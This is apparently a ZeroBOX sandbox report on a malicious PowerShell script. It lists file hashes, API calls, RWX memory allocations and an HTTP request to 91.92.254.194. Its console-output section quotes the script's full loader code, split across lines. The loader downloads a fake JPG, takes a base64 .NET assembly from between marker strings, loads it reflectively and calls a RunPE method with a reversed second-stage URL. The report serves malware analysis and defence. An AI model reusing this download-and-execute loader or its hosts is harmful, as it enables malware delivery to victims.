Summary | ZeroBOX

file_5jjhn5s1.zo4.txt.ps1

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 July 4, 2024, 9:55 a.m. July 4, 2024, 9:57 a.m.
Size 1.3KB
Type UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5 0bb85daee10c39c2eb3a05ebc874a585
SHA256 b4494b454e457c5bb20d0ec8ad6507ac6faf6f3695e9ea4917965d7e71c8e4a5
CRC32 47397348
ssdeep 24:nuGA2EiiJRCk7Lw1kfJNGkom/2PN28P8xp+DxWELCJqy:0ib1gPam/eNhP83QxvC1
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: .HGU/99055/61.532.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','R
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: egAsm','')) } }
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x000000fb
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0065bb88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features: GET method with no useragent header, Connection to IP address
suspicious_request: GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0225b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0226f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02239000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02269000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05651000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05476000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05477000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05652000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05653000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05654000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 1507328
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07760000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07893000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x07894000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05655000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05656000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05657000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05658000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05478000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05461000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2560
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05659000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received: [binary response body, not reproduced]
Data sent GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
host 91.92.254.194
Time & API Arguments Status Return Repeated

send

buffer: GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
socket: 1540
sent: 83
1 83 0